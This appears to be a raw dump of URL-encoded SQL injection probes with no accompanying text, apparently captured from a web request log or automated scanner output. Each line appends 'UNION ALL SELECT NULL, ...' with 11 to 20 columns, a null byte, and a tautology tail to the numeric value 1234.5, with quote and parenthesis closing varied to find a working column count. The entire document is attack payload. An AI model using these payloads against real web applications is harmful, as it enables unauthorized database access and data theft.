1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22kgfC%22%3D%22kgfC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22SHJS%22%3D%22SHJS 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22pVOI%22%3D%22pVOI 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22jyvZ%22%3D%22jyvZ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ZDHD%22%3D%22ZDHD 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22jlEv%22%3D%22jlEv 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22fZZp%22%3D%22fZZp 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22JSQv%22%3D%22JSQv 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22cMug%22%3D%22cMug 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22rzfY%22%3D%22rzfY 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22uOmb%22%3D%22uOmb 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ACcm%22%3D%22ACcm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22jvnj%22%3D%22jvnj 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22fQKt%22%3D%22fQKt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22UXhV%22%3D%22UXhV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22KRzN%22%3D%22KRzN 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22pqJh%22%3D%22pqJh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ExSH%22%3D%22ExSH 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22tGWk%22%3D%22tGWk 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22WLqa%22%3D%22WLqa 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22OHiG%22%3D%22OHiG 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ofYX%22%3D%22ofYX 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22XRkB%22%3D%22XRkB 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22MEhF%22%3D%22MEhF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22LQid%22%3D%22LQid 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ttYQ%22%3D%22ttYQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22vxkk%22%3D%22vxkk 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dMmC%22%3D%22dMmC 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JbyX%22%3D%22JbyX 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22kSti%22%20LIKE%20%22kSti 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22InFX%22%20LIKE%20%22InFX 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22PthJ%22%20LIKE%20%22PthJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22IHco%22%20LIKE%20%22IHco 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22IGHK%22%20LIKE%20%22IGHK 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22Ntis%22%20LIKE%20%22Ntis 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22oGzP%22%20LIKE%20%22oGzP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22yoZq%22%20LIKE%20%22yoZq 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22SgUW%22%20LIKE%20%22SgUW 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22tqNA%22%20LIKE%20%22tqNA 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22JlcT%22%20LIKE%20%22JlcT 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22jZad%22%20LIKE%20%22jZad 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22CfpZ%22%20LIKE%20%22CfpZ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22CPtJ%22%20LIKE%20%22CPtJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22VDOA%22%20LIKE%20%22VDOA 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ZApx%22%20LIKE%20%22ZApx 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Azyz%22%20LIKE%20%22Azyz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22WzTy%22%20LIKE%20%22WzTy 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22gPlZ%22%20LIKE%20%22gPlZ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22lgcb%22%20LIKE%20%22lgcb 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22RclO%22%20LIKE%20%22RclO 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22SFUE%22%20LIKE%20%22SFUE 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22SXil%22%20LIKE%20%22SXil 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ABbL%22%20LIKE%20%22ABbL 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22aLnr%22%20LIKE%20%22aLnr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22jQFt%22%20LIKE%20%22jQFt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22YIFP%22%20LIKE%20%22YIFP 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22FiHz%22%20LIKE%20%22FiHz 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22SHdK%22%20LIKE%20%22SHdK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ggOW%22%20LIKE%20%22ggOW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22uxzH%22%20LIKE%20%22uxzH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22BqTY%22%20LIKE%20%22BqTY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22qbDm%22%20LIKE%20%22qbDm 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22etad%22%20LIKE%20%22etad 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22uhgH%22%20LIKE%20%22uhgH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22leku%22%20LIKE%20%22leku 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22AZrM%22%20LIKE%20%22AZrM 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dxLt%22%20LIKE%20%22dxLt 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22HDgm%22%20LIKE%20%22HDgm 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22iJkw%22%20LIKE%20%22iJkw 1234.5%29%20WHERE%203694%3D3694%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%206150%3D6150%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%203906%3D3906%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%207610%3D7610%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%208840%3D8840%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209672%3D9672%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%206602%3D6602%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201188%3D1188%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201121%3D1121%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205724%3D5724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%204218%3D4218%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206230%3D6230%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%208572%3D8572%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%205101%3D5101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206605%3D6605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%208727%3D8727%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206804%3D6804%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 